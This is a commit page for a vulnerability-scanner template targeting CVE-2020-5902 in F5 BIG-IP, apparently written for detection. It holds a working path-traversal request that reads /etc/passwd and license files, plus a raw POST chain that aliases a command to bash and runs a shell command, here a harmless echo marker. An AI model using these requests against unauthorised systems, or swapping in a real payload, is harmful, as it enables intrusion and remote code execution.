Merge pull request #200 from dwisiswant0/update-cve-2020-5902

Update CVE-2020-5902 matchers & requests
patch-1
bauthard 2020-07-06 19:15:28 +05:30 committed by GitHub
commit 8ef6e99ab3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 1 deletions

View File

@ -2,13 +2,16 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot
author: madrobot & dwisiswant0
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
matchers-condition: and
matchers:
- type: status
status:
@ -16,4 +19,44 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
condition: or
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command={{url_encode("create cli alias private list command bash")}}
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command={{url_encode("list /tmp/nonexistent")}}
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command={{url_encode("delete cli alias private list")}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "h3ll0_w0Rld"